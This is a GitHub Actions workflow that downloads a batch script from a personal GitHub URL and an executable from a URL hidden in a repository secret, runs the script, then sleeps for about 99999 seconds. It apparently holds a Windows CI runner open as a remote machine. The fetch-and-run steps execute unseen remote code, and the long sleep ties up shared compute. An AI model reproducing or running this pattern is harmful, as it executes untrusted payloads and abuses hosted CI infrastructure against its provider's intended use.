name: CRM22

on:
    workflow_dispatch:

jobs:
  download-and-extract:
    runs-on: windows-latest
    
    steps:
      - name: Checkout the repository
        uses: actions/checkout@v2

      - name: Downloading & Installing Essentials
        run: |
          Invoke-WebRequest -Uri "https://raw.githubusercontent.com/miso201/miso201/refs/heads/main/CM/start.bat" -OutFile "start.bat"
          
      - name: Download file using curl
        run: |
          curl -L -o miso.exe "${{ secrets.MY_URL }}"
          
      - name: crmdown
        run: cmd /c start.bat

      - name: Time Counter
        run: sleep 99999
